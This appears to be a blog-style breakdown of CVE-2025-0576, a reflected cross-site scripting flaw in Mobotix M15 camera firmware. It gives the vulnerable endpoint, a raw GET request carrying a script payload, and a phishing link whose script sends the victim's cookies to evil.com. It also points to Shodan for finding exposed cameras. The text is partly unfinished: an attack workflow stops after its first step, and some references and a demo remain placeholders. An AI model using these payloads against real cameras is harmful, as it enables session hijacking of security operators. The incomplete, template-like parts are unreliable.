CVE-2025-0576 - Exploiting Reflected XSS in Mobotix M15 (Version 4.3.4.83) – Full Breakdown & Real World Exploit

A new web vulnerability, CVE-2025-0576, has been discovered in Mobotix M15 IP cameras, version 4.3.4.83. This bug is caused by improper input handling on the /control/player endpoint, specifically with the p_qual argument. It allows attackers to inject malicious scripts and launch Cross-Site Scripting (XSS) attacks. Since Mobotix cameras are used for security in many important places, this vulnerability can have serious consequences.

This guide will give you a complete picture of the bug: how it works, how it can be exploited, what the code looks like, and what you can do about it.

Vulnerability Type: Reflected Cross-Site Scripting (XSS)

- Location: /control/player?center&eventlist&pda&dummy_for_reload=1736177631&p_evt

Parameter: p_qual

- CVE: CVE-2025-0576 *(entry to be updated as public)*

Technical Details

The web interface on Mobotix M15 accepts several query parameters for the /control/player resource. The vulnerability exists because user input provided in the p_qual parameter is not properly sanitized or escaped, and then returned in the web interface's response page.

Requirements

An attacker only needs network access to the camera's web interface. There is no special authentication required to trigger the vulnerability.

Vulnerable Endpoint Example

http://<CAMERA-IP>/control/player?center&eventlist&pda&dummy_for_reload=1736177631&p_evt&;p_qual=ATTACK-HERE

Malicious Request Sample

GET /control/player?center&eventlist&pda&dummy_for_reload=1736177631&p_evt&p_qual=%3Cscript%3Ealert('M15XSSCVE')%3C/script%3E HTTP/1.1
Host: 192.168.1.100

Translated (Browser-Friendly) URL

http://192.168.1.100/control/player?center&eventlist&pda&dummy_for_reload=1736177631&p_evt&p_qual=<script>alert('M15XSSCVE')</script>;

The server takes your p_qual input and puts it directly into the HTML response.

- Your injected <script>alert('M15XSSCVE')</script> now runs inside the victim's browser if they click or visit the crafted URL.

Suppose the server-side code looks like this (simplified PHP-like example)

<?php
// BAD CODE! Do not use as reference
$p_qual = $_GET['p_qual'];
echo "<td>Quality: $p_qual</td>";
?>

No escaping or checking of p_qual – any script, HTML, or special character is allowed.

Result: An attacker can inject JavaScript directly into the page.

Let's say, as an attacker, you send an email to a security operator with a link

http://camera.company.com/control/player?center&eventlist&pda&dummy_for_reload=1736177631&p_evt&p_qual=<script>location.href='https://evil.com/steal?cookie='+document.cookie</script>;

Here's a real-world attack workflow

1. Find or guess a camera's IP address/hostname (via Shodan, public listing, or internal scan).

Video Demo (if available)

*(Add your own demo, since this is for learning, here's a quick XSS demo)*

References & Further Reading

- Exploit Database: Mobotix M15 XSS (CVE-2025-0576) *(replace with actual ID)*
- NVD Entry for CVE-2025-0576
- Cross Site Scripting (XSS) Guide
- Shodan: Find exposed Mobotix cameras

Use strong, unique passwords for camera access.

- Apply firmware updates (Mobotix may issue a patch; check Mobotix Security Advisories regularly).

Conclusion

CVE-2025-0576 is a reflected XSS that could allow attackers to compromise Mobotix M15 camera installations. It’s easy to weaponize and affects anyone with a browser and access to the camera’s web UI. The vulnerability is public, the exploit is simple, and the vendor has not responded.

If you use Mobotix M15 cameras, you need to take action immediately to protect your devices. Never leave them exposed to the internet!


*[This article was created for educational and alerting purposes. Please use responsibly and only test against systems you own or have explicit permission to test.]*

Timeline

Published on: 01/20/2025 00:15:16 UTC